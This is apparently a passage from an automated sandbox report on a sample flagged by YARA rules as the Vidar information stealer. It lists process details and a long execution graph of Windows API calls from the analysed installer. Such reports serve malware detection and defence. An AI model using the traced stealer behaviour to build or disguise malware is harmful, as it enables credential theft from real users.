                                                                                      • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000003.3254796660.00000000015AE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000002.4074431990.000000000178F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      Antivirus matches:
                                                                                      • Detection: 5%, ReversingLabs
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:12
                                                                                      Start time:14:46:55
                                                                                      Start date:29/08/2024
                                                                                      Path:C:\Windows\SysWOW64\choice.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:choice /d y /t 5
                                                                                      Imagebase:0xb30000
                                                                                      File size:28'160 bytes
                                                                                      MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:moderate
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:17
                                                                                      Start time:14:50:03
                                                                                      Start date:29/08/2024
                                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2260 -s 3264
                                                                                      Imagebase:0x420000
                                                                                      File size:483'680 bytes
                                                                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      Disassembly

                                                                                      Reset < >

                                                                                        Execution Graph

                                                                                        Execution Coverage:13.2%
                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                        Signature Coverage:20.6%
                                                                                        Total number of Nodes:1523
                                                                                        Total number of Limit Nodes:39
                                                                                        execution_graph 4187 402fc0 4188 401446 18 API calls 4187->4188 4189 402fc7 4188->4189 4190 403017 4189->4190 4191 40300a 4189->4191 4194 401a13 4189->4194 4192 406805 18 API calls 4190->4192 4193 401446 18 API calls 4191->4193 4192->4194 4193->4194 4195 4023c1 4196 40145c 18 API calls 4195->4196 4197 4023c8 4196->4197 4200 40726a 4197->4200 4203 406ed2 CreateFileW 4200->4203 4204 406f04 4203->4204 4205 406f1e ReadFile 4203->4205 4206 4062a3 11 API calls 4204->4206 4207 4023d6 4205->4207 4210 406f84 4205->4210 4206->4207 4208 4071e3 CloseHandle 4208->4207 4209 406f9b ReadFile lstrcpynA lstrcmpA 4209->4210 4211 406fe2 SetFilePointer ReadFile 4209->4211 4210->4207 4210->4208 4210->4209 4214 406fdd 4210->4214 4211->4208 4212 4070a8 ReadFile 4211->4212 4213 407138 4212->4213 4213->4212 4213->4214 4215 40715f SetFilePointer GlobalAlloc ReadFile 4213->4215 4214->4208 4216 4071a3 4215->4216 4217 4071bf lstrcpynW GlobalFree 4215->4217 4216->4216 4216->4217 4217->4208 4218 401cc3 4219 40145c 18 API calls 4218->4219 4220 401cca lstrlenW 4219->4220 4221 4030dc 4220->4221 4222 4030e3 4221->4222 4224 405f51 wsprintfW 4221->4224 4224->4222 4239 401c46 4240 40145c 18 API calls 4239->4240 4241 401c4c 4240->4241 4242 4062a3 11 API calls 4241->4242 4243 401c59 4242->4243 4244 406c9b 81 API calls 4243->4244 4245 401c64 4244->4245 4246 403049 4247 401446 18 API calls 4246->4247 4250 403050 4247->4250 4248 406805 18 API calls 4249 401a13 4248->4249 4250->4248 4250->4249 4251 40204a 4252 401446 18 API calls 4251->4252 4253 402051 IsWindow 4252->4253 4254 4018d3 4253->4254 4255 40324c 4256 403277 4255->4256 4257 40325e SetTimer 4255->4257 4258 4032cc 4256->4258 4259 403291 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4256->4259 4257->4256 4259->4258 4260 4048cc 4261 4048f1 4260->4261 4262 4048da 4260->4262 4264 4048ff IsWindowVisible 4261->4264 4268 404916 4261->4268 4263 4048e0 4262->4263 4278 40495a 4262->4278 4265 403daf SendMessageW 4263->4265 4267 40490c 4264->4267 4264->4278 4269 4048ea 4265->4269 4266 404960 CallWindowProcW 4266->4269 4279 40484e SendMessageW 4267->4279 4268->4266 4284 406009 lstrcpynW 4268->4284 4272 404945 4285 405f51 wsprintfW 4272->4285 4274 40494c 4275 40141d 80 API calls 4274->4275 4276 404953 4275->4276 4286 406009 lstrcpynW 4276->4286 4278->4266 4280 404871 GetMessagePos ScreenToClient SendMessageW 4279->4280 4281 4048ab SendMessageW 4279->4281 4282 4048a3 4280->4282 4283 4048a8 4280->4283 4281->4282 4282->4268 4283->4281 4284->4272 4285->4274 4286->4278 4287 4022cc 4288 40145c 18 API calls 4287->4288 4289 4022d3 4288->4289 4290 4062d5 2 API calls 4289->4290 4291 4022d9 4290->4291 4292 4022e8 4291->4292 4296 405f51 wsprintfW 4291->4296 4295 4030e3 4292->4295 4297 405f51 wsprintfW 4292->4297 4296->4292 4297->4295 4298 4050cd 4299 405295 4298->4299 4300 4050ee GetDlgItem GetDlgItem GetDlgItem 4298->4300 4301 4052c6 4299->4301 4302 40529e GetDlgItem CreateThread CloseHandle 4299->4302 4347 403d98 SendMessageW 4300->4347 4304 4052f4 4301->4304 4306 4052e0 ShowWindow ShowWindow 4301->4306 4307 405316 4301->4307 4302->4301 4308 405352 4304->4308 4310 405305 4304->4310 4311 40532b ShowWindow 4304->4311 4305 405162 4318 406805 18 API calls 4305->4318 4352 403d98 SendMessageW 4306->4352 4356 403dca 4307->4356 4308->4307 4313 40535d SendMessageW 4308->4313 4353 403d18 4310->4353 4316 40534b 4311->4316 4317 40533d 4311->4317 4315 40528e 4313->4315 4320 405376 CreatePopupMenu 4313->4320 4319 403d18 SendMessageW 4316->4319 4321 404f72 25 API calls 4317->4321 4322 405181 4318->4322 4319->4308 4323 406805 18 API calls 4320->4323 4321->4316 4324 4062a3 11 API calls 4322->4324 4326 405386 AppendMenuW 4323->4326 4325 40518c GetClientRect GetSystemMetrics SendMessageW SendMessageW 4324->4325 4327 4051f3 4325->4327 4328 4051d7 SendMessageW SendMessageW 4325->4328 4329 405399 GetWindowRect 4326->4329 4330 4053ac 4326->4330 4331 405206 4327->4331 4332 4051f8 SendMessageW 4327->4332 4328->4327 4333 4053b3 TrackPopupMenu 4329->4333 4330->4333 4348 403d3f 4331->4348 4332->4331 4333->4315 4335 4053d1 4333->4335 4337 4053ed SendMessageW 4335->4337 4336 405216 4338 405253 GetDlgItem SendMessageW 4336->4338 4339 40521f ShowWindow 4336->4339 4337->4337 4340 40540a OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4337->4340 4338->4315 4343 405276 SendMessageW SendMessageW 4338->4343 4341 405242 4339->4341 4342 405235 ShowWindow 4339->4342 4344 40542f SendMessageW 4340->4344 4351 403d98 SendMessageW 4341->4351 4342->4341 4343->4315 4344->4344 4345 40545a GlobalUnlock SetClipboardData CloseClipboard 4344->4345 4345->4315 4347->4305 4349 406805 18 API calls 4348->4349 4350 403d4a SetDlgItemTextW 4349->4350 4350->4336 4351->4338 4352->4304 4354 403d25 SendMessageW 4353->4354 4355 403d1f 4353->4355 4354->4307 4355->4354 4357 403ddf GetWindowLongW 4356->4357 4367 403e68 4356->4367 4358 403df0 4357->4358 4357->4367 4359 403e02 4358->4359 4360 403dff GetSysColor 4358->4360 4361 403e12 SetBkMode 4359->4361 4362 403e08 SetTextColor 4359->4362 4360->4359 4363 403e30 4361->4363 4364 403e2a GetSysColor 4361->4364 4362->4361 4365 403e41 4363->4365 4366 403e37 SetBkColor 4363->4366 4364->4363 4365->4367 4368 403e54 DeleteObject 4365->4368 4369 403e5b CreateBrushIndirect 4365->4369 4366->4365 4367->4315 4368->4369 4369->4367 4370 4030cf 4371 40145c 18 API calls 4370->4371 4372 4030d6 4371->4372 4374 4030dc 4372->4374 4377 4063ac GlobalAlloc lstrlenW 4372->4377 4375 4030e3 4374->4375 4404 405f51 wsprintfW 4374->4404 4378 4063e2 4377->4378 4379 406434 4377->4379 4380 40640f GetVersionExW 4378->4380 4405 40602b CharUpperW 4378->4405 4379->4374 4380->4379 4381 40643e 4380->4381 4382 406464 LoadLibraryA 4381->4382 4383 40644d 4381->4383 4382->4379 4386 406482 GetProcAddress GetProcAddress GetProcAddress 4382->4386 4383->4379 4385 406585 GlobalFree 4383->4385 4387 40659b LoadLibraryA 4385->4387 4388 4066dd FreeLibrary 4385->4388 4391 4064aa 4386->4391 4394 4065f5 4386->4394 4387->4379 4390 4065b5 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4387->4390 4388->4379 4389 406651 FreeLibrary 4398 40662a 4389->4398 4390->4394 4392 4064ce FreeLibrary GlobalFree 4391->4392 4391->4394 4400 4064ea 4391->4400 4392->4379 4393 4066ea 4396 4066ef CloseHandle FreeLibrary 4393->4396 4394->4389 4394->4398 4395 4064fc lstrcpyW OpenProcess 4397 40654f CloseHandle CharUpperW lstrcmpW 4395->4397 4395->4400 4399 406704 CloseHandle 4396->4399 4397->4394 4397->4400 4398->4393 4401 406685 lstrcmpW 4398->4401 4402 4066b6 CloseHandle 4398->4402 4403 4066d4 CloseHandle 4398->4403 4399->4396 4400->4385 4400->4395 4400->4397 4401->4398 4401->4399 4402->4398 4403->4388 4404->4375 4405->4378 4406 407752 4410 407344 4406->4410 4407 407c6d 4408 4073c2 GlobalFree 4409 4073cb GlobalAlloc 4408->4409 4409->4407 4409->4410 4410->4407 4410->4408 4410->4409 4410->4410 4411 407443 GlobalAlloc 4410->4411 4412 40743a GlobalFree 4410->4412 4411->4407 4411->4410 4412->4411 4413 401dd3 4414 401446 18 API calls 4413->4414 4415 401dda 4414->4415 4416 401446 18 API calls 4415->4416 4417 4018d3 4416->4417 4425 402e55 4426 40145c 18 API calls 4425->4426 4427 402e63 4426->4427 4428 402e79 4427->4428 4429 40145c 18 API calls 4427->4429 4430 405e30 2 API calls 4428->4430 4429->4428 4431 402e7f 4430->4431 4455 405e50 GetFileAttributesW CreateFileW 4431->4455 4433 402e8c 4434 402f35 4433->4434 4435 402e98 GlobalAlloc 4433->4435 4438 4062a3 11 API calls 4434->4438 4436 402eb1 4435->4436 4437 402f2c CloseHandle 4435->4437 4456 403368 SetFilePointer 4436->4456 4437->4434 4440 402f45 4438->4440 4442 402f50 DeleteFileW 4440->4442 4443 402f63 4440->4443 4441 402eb7 4445 403336 ReadFile 4441->4445 4442->4443 4457 401435 4443->4457 4446 402ec0 GlobalAlloc 4445->4446 4447 402ed0 4446->4447 4448 402f04 WriteFile GlobalFree 4446->4448 4449 40337f 37 API calls 4447->4449 4450 40337f 37 API calls 4448->4450 4454 402edd 4449->4454 4451 402f29 4450->4451 4451->4437 4453 402efb GlobalFree 4453->4448 4454->4453 4455->4433 4456->4441 4458 404f72 25 API calls 4457->4458 4459 401443 4458->4459 4460 401cd5 4461 401446 18 API calls 4460->4461 4462 401cdd 4461->4462 4463 401446 18 API calls 4462->4463 4464 401ce8 4463->4464 4465 40145c 18 API calls 4464->4465 4466 401cf1 4465->4466 4467 401d07 lstrlenW 4466->4467 4468 401d43 4466->4468 4469 401d11 4467->4469 4469->4468 4473 406009 lstrcpynW 4469->4473 4471 401d2c 4471->4468 4472 401d39 lstrlenW 4471->4472 4472->4468 4473->4471 4474 403cd6 4475 403ce1 4474->4475 4476 403ce5 4475->4476 4477 403ce8 GlobalAlloc 4475->4477 4477->4476 4478 402cd7 4479 401446 18 API calls 4478->4479 4482 402c64 4479->4482 4480 402d99 4481 402d17 ReadFile 4481->4482 4482->4478 4482->4480 4482->4481 4483 402dd8 4484 402ddf 4483->4484 4485 4030e3 4483->4485 4486 402de5 FindClose 4484->4486 4486->4485 4487 401d5c 4488 40145c 18 API calls 4487->4488 4489 401d63 4488->4489 4490 40145c 18 API calls 4489->4490 4491 401d6c 4490->4491 4492 401d73 lstrcmpiW 4491->4492 4493 401d86 lstrcmpW 4491->4493 4494 401d79 4492->4494 4493->4494 4495 401c99 4493->4495 4494->4493 4494->4495 4125 407c5f 4126 407344 4125->4126 4127 4073c2 GlobalFree 4126->4127 4128 4073cb GlobalAlloc 4126->4128 4129 407c6d 4126->4129 4130 407443 GlobalAlloc 4126->4130 4131 40743a GlobalFree 4126->4131 4127->4128 4128->4126 4128->4129 4130->4126 4130->4129 4131->4130 4496 404363 4497 404373 4496->4497 4498 40439c 4496->4498 4500 403d3f 19 API calls 4497->4500 4499 403dca 8 API calls 4498->4499 4501 4043a8 4499->4501 4502 404380 SetDlgItemTextW 4500->4502 4502->4498 4503 4027e3 4504 4027e9 4503->4504 4505 4027f2 4504->4505 4506 402836 4504->4506 4519 401553 4505->4519 4507 40145c 18 API calls 4506->4507 4509 40283d 4507->4509 4511 4062a3 11 API calls 4509->4511 4510 4027f9 4512 40145c 18 API calls 4510->4512 4517 401a13 4510->4517 4513 40284d 4511->4513 4514 40280a RegDeleteValueW 4512->4514 4523 40149d RegOpenKeyExW 4513->4523 4515 4062a3 11 API calls 4514->4515 4518 40282a RegCloseKey 4515->4518 4518->4517 4520 401563 4519->4520 4521 40145c 18 API calls 4520->4521 4522 401589 RegOpenKeyExW 4521->4522 4522->4510 4529 401515 4523->4529 4531 4014c9 4523->4531 4524 4014ef RegEnumKeyW 4525 401501 RegCloseKey 4524->4525 4524->4531 4526 4062fc 3 API calls 4525->4526 4528 401511 4526->4528 4527 401526 RegCloseKey 4527->4529 4528->4529 4532 401541 RegDeleteKeyW 4528->4532 4529->4517 4530 40149d 3 API calls 4530->4531 4531->4524 4531->4525 4531->4527 4531->4530 4532->4529 4533 403f64 4534 403f90 4533->4534 4535 403f74 4533->4535 4537 403fc3 4534->4537 4538 403f96 SHGetPathFromIDListW 4534->4538 4544 405c84 GetDlgItemTextW 4535->4544 4540 403fad SendMessageW 4538->4540 4541 403fa6 4538->4541 4539 403f81 SendMessageW 4539->4534 4540->4537 4542 40141d 80 API calls 4541->4542 4542->4540 4544->4539 4545 402ae4 4546 402aeb 4545->4546 4547 4030e3 4545->4547 4548 402af2 CloseHandle 4546->4548 4548->4547 4549 402065 4550 401446 18 API calls 4549->4550 4551 40206d 4550->4551 4552 401446 18 API calls 4551->4552 4553 402076 GetDlgItem 4552->4553 4554 4030dc 4553->4554 4555 4030e3 4554->4555 4557 405f51 wsprintfW 4554->4557 4557->4555 4558 402665 4559 40145c 18 API calls 4558->4559 4560 40266b 4559->4560 4561 40145c 18 API calls 4560->4561 4562 402674 4561->4562 4563 40145c 18 API calls 4562->4563 4564 40267d 4563->4564 4565 4062a3 11 API calls 4564->4565 4566 40268c 4565->4566 4567 4062d5 2 API calls 4566->4567 4568 402695 4567->4568 4569 4026a6 lstrlenW lstrlenW 4568->4569 4570 404f72 25 API calls 4568->4570 4573 4030e3 4568->4573 4571 404f72 25 API calls 4569->4571 4570->4568 4572 4026e8 SHFileOperationW 4571->4572 4572->4568 4572->4573 4581 401c69 4582 40145c 18 API calls 4581->4582 4583 401c70 4582->4583 4584 4062a3 11 API calls 4583->4584 4585 401c80 4584->4585 4586 405ca0 MessageBoxIndirectW 4585->4586 4587 401a13 4586->4587 4595 402f6e 4596 402f72 4595->4596 4597 402fae 4595->4597 4598 4062a3 11 API calls 4596->4598 4599 40145c 18 API calls 4597->4599 4600 402f7d 4598->4600 4605 402f9d 4599->4605 4601 4062a3 11 API calls 4600->4601 4602 402f90 4601->4602 4603 402fa2 4602->4603 4604 402f98 4602->4604 4607 4060e7 9 API calls 4603->4607 4606 403e74 5 API calls 4604->4606 4606->4605 4607->4605 4608 4023f0 4609 402403 4608->4609 4610 4024da 4608->4610 4611 40145c 18 API calls 4609->4611 4612 404f72 25 API calls 4610->4612 4613 40240a 4611->4613 4618 4024f1 4612->4618 4614 40145c 18 API calls 4613->4614 4615 402413 4614->4615 4616 402429 LoadLibraryExW 4615->4616 4617 40241b GetModuleHandleW 4615->4617 4619 40243e 4616->4619 4620 4024ce 4616->4620 4617->4616 4617->4619 4632 406365 GlobalAlloc WideCharToMultiByte 4619->4632 4621 404f72 25 API calls 4620->4621 4621->4610 4623 402449 4624 40248c 4623->4624 4625 40244f 4623->4625 4626 404f72 25 API calls 4624->4626 4628 401435 25 API calls 4625->4628 4630 40245f 4625->4630 4627 402496 4626->4627 4629 4062a3 11 API calls 4627->4629 4628->4630 4629->4630 4630->4618 4631 4024c0 FreeLibrary 4630->4631 4631->4618 4633 406390 GetProcAddress 4632->4633 4634 40639d GlobalFree 4632->4634 4633->4634 4634->4623 4635 402df3 4636 402dfa 4635->4636 4638 4019ec 4635->4638 4637 402e07 FindNextFileW 4636->4637 4637->4638 4639 402e16 4637->4639 4641 406009 lstrcpynW 4639->4641 4641->4638 4642 402175 4643 401446 18 API calls 4642->4643 4644 40217c 4643->4644 4645 401446 18 API calls 4644->4645 4646 402186 4645->4646 4647 4062a3 11 API calls 4646->4647 4651 402197 4646->4651 4647->4651 4648 4021aa EnableWindow 4650 4030e3 4648->4650 4649 40219f ShowWindow 4649->4650 4651->4648 4651->4649 4659 404077 4660 404081 4659->4660 4661 404084 lstrcpynW lstrlenW 4659->4661 4660->4661 4662 405479 4663 405491 4662->4663 4664 4055cd 4662->4664 4663->4664 4665 40549d 4663->4665 4666 40561e 4664->4666 4667 4055de GetDlgItem GetDlgItem 4664->4667 4668 4054a8 SetWindowPos 4665->4668 4669 4054bb 4665->4669 4671 405678 4666->4671 4679 40139d 80 API calls 4666->4679 4670 403d3f 19 API calls 4667->4670 4668->4669 4673 4054c0 ShowWindow 4669->4673 4674 4054d8 4669->4674 4675 405608 SetClassLongW 4670->4675 4672 403daf SendMessageW 4671->4672 4692 4055c8 4671->4692 4701 40568a 4672->4701 4673->4674 4676 4054e0 DestroyWindow 4674->4676 4677 4054fa 4674->4677 4678 40141d 80 API calls 4675->4678 4729 4058dc 4676->4729 4680 405510 4677->4680 4681 4054ff SetWindowLongW 4677->4681 4678->4666 4682 405650 4679->4682 4685 405587 4680->4685 4686 40551c GetDlgItem 4680->4686 4681->4692 4682->4671 4687 405654 SendMessageW 4682->4687 4683 40141d 80 API calls 4683->4701 4684 4058de DestroyWindow EndDialog 4684->4729 4688 403dca 8 API calls 4685->4688 4690 40554c 4686->4690 4691 40552f SendMessageW IsWindowEnabled 4686->4691 4687->4692 4688->4692 4689 40590d ShowWindow 4689->4692 4694 405559 4690->4694 4695 4055a0 SendMessageW 4690->4695 4696 40556c 4690->4696 4704 405551 4690->4704 4691->4690 4691->4692 4693 406805 18 API calls 4693->4701 4694->4695 4694->4704 4695->4685 4699 405574 4696->4699 4700 405589 4696->4700 4697 403d18 SendMessageW 4697->4685 4698 403d3f 19 API calls 4698->4701 4702 40141d 80 API calls 4699->4702 4703 40141d 80 API calls 4700->4703 4701->4683 4701->4684 4701->4692 4701->4693 4701->4698 4705 403d3f 19 API calls 4701->4705 4720 40581e DestroyWindow 4701->4720 4702->4704 4703->4704 4704->4685 4704->4697 4706 405705 GetDlgItem 4705->4706 4707 405723 ShowWindow EnableWindow 4706->4707 4708 40571a 4706->4708 4730 403d85 EnableWindow 4707->4730 4708->4707 4710 40574d EnableWindow 4713 405761 4710->4713 4711 405766 GetSystemMenu EnableMenuItem SendMessageW 4712 405796 SendMessageW 4711->4712 4711->4713 4712->4713 4713->4711 4731 403d98 SendMessageW 4713->4731 4732 406009 lstrcpynW 4713->4732 4716 4057c4 lstrlenW 4717 406805 18 API calls 4716->4717 4718 4057da SetWindowTextW 4717->4718 4719 40139d 80 API calls 4718->4719 4719->4701 4721 405838 CreateDialogParamW 4720->4721 4720->4729 4722 40586b 4721->4722 4721->4729 4723 403d3f 19 API calls 4722->4723 4724 405876 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4723->4724 4725 40139d 80 API calls 4724->4725 4726 4058bc 4725->4726 4726->4692 4727 4058c4 ShowWindow 4726->4727 4728 403daf SendMessageW 4727->4728 4728->4729 4729->4689 4729->4692 4730->4710 4731->4713 4732->4716 4733 4020f9 GetDC GetDeviceCaps 4734 401446 18 API calls 4733->4734 4735 402116 MulDiv 4734->4735 4736 401446 18 API calls 4735->4736 4737 40212c 4736->4737 4738 406805 18 API calls 4737->4738 4739 402165 CreateFontIndirectW 4738->4739 4740 4030dc 4739->4740 4741 4030e3 4740->4741 4743 405f51 wsprintfW 4740->4743 4743->4741 4744 4024fb 4745 40145c 18 API calls 4744->4745 4746 402502 4745->4746 4747 40145c 18 API calls 4746->4747 4748 40250c 4747->4748 4749 40145c 18 API calls 4748->4749 4750 402515 4749->4750 4751 40145c 18 API calls 4750->4751 4752 40251f 4751->4752 4753 40145c 18 API calls 4752->4753 4754 402529 4753->4754 4755 40253d 4754->4755 4756 40145c 18 API calls 4754->4756 4757 4062a3 11 API calls 4755->4757 4756->4755 4758 40256a CoCreateInstance 4757->4758 4759 40258c 4758->4759 4760 40497c GetDlgItem GetDlgItem 4761 4049d2 7 API calls 4760->4761 4766 404bea 4760->4766 4762 404a76 DeleteObject 4761->4762 4763 404a6a SendMessageW 4761->4763 4764 404a81 4762->4764 4763->4762 4767 404ab8 4764->4767 4769 406805 18 API calls 4764->4769 4765 404ccf 4768 404d74 4765->4768 4773 404bdd 4765->4773 4778 404d1e SendMessageW 4765->4778 4766->4765 4776 40484e 5 API calls 4766->4776 4789 404c5a 4766->4789 4772 403d3f 19 API calls 4767->4772 4770 404d89 4768->4770 4771 404d7d SendMessageW 4768->4771 4775 404a9a SendMessageW SendMessageW 4769->4775 4780 404da2 4770->4780 4781 404d9b ImageList_Destroy 4770->4781 4791 404db2 4770->4791 4771->4770 4777 404acc 4772->4777 4779 403dca 8 API calls 4773->4779 4774 404cc1 SendMessageW 4774->4765 4775->4764 4776->4789 4782 403d3f 19 API calls 4777->4782 4778->4773 4784 404d33 SendMessageW 4778->4784 4785 404f6b 4779->4785 4786 404dab GlobalFree 4780->4786 4780->4791 4781->4780 4787 404add 4782->4787 4783 404f1c 4783->4773 4792 404f31 ShowWindow GetDlgItem ShowWindow 4783->4792 4788 404d46 4784->4788 4786->4791 4790 404baa GetWindowLongW SetWindowLongW 4787->4790 4799 404ba4 4787->4799 4802 404b39 SendMessageW 4787->4802 4803 404b67 SendMessageW 4787->4803 4804 404b7b SendMessageW 4787->4804 4798 404d57 SendMessageW 4788->4798 4789->4765 4789->4774 4793 404bc4 4790->4793 4791->4783 4794 404de4 4791->4794 4797 40141d 80 API calls 4791->4797 4792->4773 4795 404be2 4793->4795 4796 404bca ShowWindow 4793->4796 4807 404e12 SendMessageW 4794->4807 4810 404e28 4794->4810 4812 403d98 SendMessageW 4795->4812 4811 403d98 SendMessageW 4796->4811 4797->4794 4798->4768 4799->4790 4799->4793 4802->4787 4803->4787 4804->4787 4805 404ef3 InvalidateRect 4805->4783 4806 404f09 4805->4806 4813 4043ad 4806->4813 4807->4810 4809 404ea1 SendMessageW SendMessageW 4809->4810 4810->4805 4810->4809 4811->4773 4812->4766 4814 4043cd 4813->4814 4815 406805 18 API calls 4814->4815 4816 40440d 4815->4816 4817 406805 18 API calls 4816->4817 4818 404418 4817->4818 4819 406805 18 API calls 4818->4819 4820 404428 lstrlenW wsprintfW SetDlgItemTextW 4819->4820 4820->4783 4821 4026fc 4822 401ee4 4821->4822 4824 402708 4821->4824 4822->4821 4823 406805 18 API calls 4822->4823 4823->4822 4120 4019fd 4121 40145c 18 API calls 4120->4121 4122 401a04 4121->4122 4123 405e7f 2 API calls 4122->4123 4124 401a0b 4123->4124 4825 4022fd 4826 40145c 18 API calls 4825->4826 4827 402304 GetFileVersionInfoSizeW 4826->4827 4828 40232b GlobalAlloc 4827->4828 4832 4030e3 4827->4832 4829 40233f GetFileVersionInfoW 4828->4829 4828->4832 4830 402350 VerQueryValueW 4829->4830 4831 402381 GlobalFree 4829->4831 4830->4831 4834 402369 4830->4834 4831->4832 4838 405f51 wsprintfW 4834->4838 4836 402375 4839 405f51 wsprintfW 4836->4839 4838->4836 4839->4831 4840 402afd 4841 40145c 18 API calls 4840->4841 4842 402b04 4841->4842 4847 405e50 GetFileAttributesW CreateFileW 4842->4847 4844 402b10 4845 4030e3 4844->4845 4848 405f51 wsprintfW 4844->4848 4847->4844 4848->4845 4849 4029ff 4850 401553 19 API calls 4849->4850 4851 402a09 4850->4851 4852 40145c 18 API calls 4851->4852 4853 402a12 4852->4853 4854 402a1f RegQueryValueExW 4853->4854 4856 401a13 4853->4856 4855 402a3f 4854->4855 4859 402a45 4854->4859 4855->4859 4860 405f51 wsprintfW 4855->4860 4858 4029e4 RegCloseKey 4858->4856 4859->4856 4859->4858 4860->4859 4861 401000 4862 401037 BeginPaint GetClientRect 4861->4862 4863 40100c DefWindowProcW 4861->4863 4865 4010fc 4862->4865 4866 401182 4863->4866 4867 401073 CreateBrushIndirect FillRect DeleteObject 4865->4867 4868 401105 4865->4868 4867->4865 4869 401170 EndPaint 4868->4869 4870 40110b CreateFontIndirectW 4868->4870 4869->4866 4870->4869 4871 40111b 6 API calls 4870->4871 4871->4869 4872 401f80 4873 401446 18 API calls 4872->4873 4874 401f88 4873->4874 4875 401446 18 API calls 4874->4875 4876 401f93 4875->4876 4877 401fa3 4876->4877 4878 40145c 18 API calls 4876->4878 4879 401fb3 4877->4879 4880 40145c 18 API calls 4877->4880 4878->4877 4881 402006 4879->4881 4882 401fbc 4879->4882 4880->4879 4884 40145c 18 API calls 4881->4884 4883 401446 18 API calls 4882->4883 4886 401fc4 4883->4886 4885 40200d 4884->4885 4887 40145c 18 API calls 4885->4887 4888 401446 18 API calls 4886->4888 4889 402016 FindWindowExW 4887->4889 4890 401fce 4888->4890 4894 402036 4889->4894 4891 401ff6 SendMessageW 4890->4891 4892 401fd8 SendMessageTimeoutW 4890->4892 4891->4894 4892->4894 4893 4030e3 4894->4893 4896 405f51 wsprintfW 4894->4896 4896->4893 4897 402880 4898 402884 4897->4898 4899 40145c 18 API calls 4898->4899 4900 4028a7 4899->4900 4901 40145c 18 API calls 4900->4901 4902 4028b1 4901->4902 4903 4028ba RegCreateKeyExW 4902->4903 4904 4028e8 4903->4904 4911 4029ef 4903->4911 4905 402934 4904->4905 4906 40145c 18 API calls 4904->4906 4907 402963 4905->4907 4910 401446 18 API calls 4905->4910 4909 4028fc lstrlenW 4906->4909 4908 4029ae RegSetValueExW 4907->4908 4912 40337f 37 API calls 4907->4912 4915 4029c6 RegCloseKey 4908->4915 4916 4029cb 4908->4916 4913 402918 4909->4913 4914 40292a 4909->4914 4917 402947 4910->4917 4918 40297b 4912->4918 4919 4062a3 11 API calls 4913->4919 4920 4062a3 11 API calls 4914->4920 4915->4911 4921 4062a3 11 API calls 4916->4921 4922 4062a3 11 API calls 4917->4922 4928 406224 4918->4928 4924 402922 4919->4924 4920->4905 4921->4915 4922->4907 4924->4908 4927 4062a3 11 API calls 4927->4924 4929 406247 4928->4929 4930 40628a 4929->4930 4931 40625c wsprintfW 4929->4931 4932 402991 4930->4932 4933 406293 lstrcatW 4930->4933 4931->4930 4931->4931 4932->4927 4933->4932 4934 402082 4935 401446 18 API calls 4934->4935 4936 402093 SetWindowLongW 4935->4936 4937 4030e3 4936->4937 3462 403883 #17 SetErrorMode OleInitialize 3536 4062fc GetModuleHandleA 3462->3536 3466 4038f1 GetCommandLineW 3541 406009 lstrcpynW 3466->3541 3468 403903 GetModuleHandleW 3469 40391b 3468->3469 3542 405d06 3469->3542 3472 4039d6 3473 4039f5 GetTempPathW 3472->3473 3546 4037cc 3473->3546 3475 403a0b 3476 403a33 DeleteFileW 3475->3476 3477 403a0f GetWindowsDirectoryW lstrcatW 3475->3477 3554 403587 GetTickCount GetModuleFileNameW 3476->3554 3479 4037cc 11 API calls 3477->3479 3478 405d06 CharNextW 3485 40393c 3478->3485 3481 403a2b 3479->3481 3481->3476 3483 403acc 3481->3483 3482 403a47 3482->3483 3486 403ab1 3482->3486 3487 405d06 CharNextW 3482->3487 3640 403859 3483->3640 3485->3472 3485->3478 3493 4039d8 3485->3493 3582 40592c 3486->3582 3499 403a5e 3487->3499 3491 403ae1 3647 405ca0 3491->3647 3492 403bce 3495 403c51 3492->3495 3497 4062fc 3 API calls 3492->3497 3651 406009 lstrcpynW 3493->3651 3501 403bdd 3497->3501 3502 403af7 lstrcatW lstrcmpiW 3499->3502 3503 403a89 3499->3503 3504 4062fc 3 API calls 3501->3504 3502->3483 3506 403b13 CreateDirectoryW SetCurrentDirectoryW 3502->3506 3652 40677e 3503->3652 3507 403be6 3504->3507 3509 403b36 3506->3509 3510 403b2b 3506->3510 3511 4062fc 3 API calls 3507->3511 3682 406009 lstrcpynW 3509->3682 3681 406009 lstrcpynW 3510->3681 3515 403bef 3511->3515 3514 403b44 3683 406009 lstrcpynW 3514->3683 3518 403c3d ExitWindowsEx 3515->3518 3523 403bfd GetCurrentProcess 3515->3523 3518->3495 3520 403c4a 3518->3520 3519 403aa6 3667 406009 lstrcpynW 3519->3667 3711 40141d 3520->3711 3526 403c0d 3523->3526 3526->3518 3527 403b79 CopyFileW 3529 403b53 3527->3529 3528 403bc2 3530 406c68 42 API calls 3528->3530 3529->3528 3533 406805 18 API calls 3529->3533 3535 403bad CloseHandle 3529->3535 3684 406805 3529->3684 3703 406c68 3529->3703 3708 405c3f CreateProcessW 3529->3708 3532 403bc9 3530->3532 3532->3483 3533->3529 3535->3529 3537 406314 LoadLibraryA 3536->3537 3538 40631f GetProcAddress 3536->3538 3537->3538 3539 4038c6 SHGetFileInfoW 3537->3539 3538->3539 3540 406009 lstrcpynW 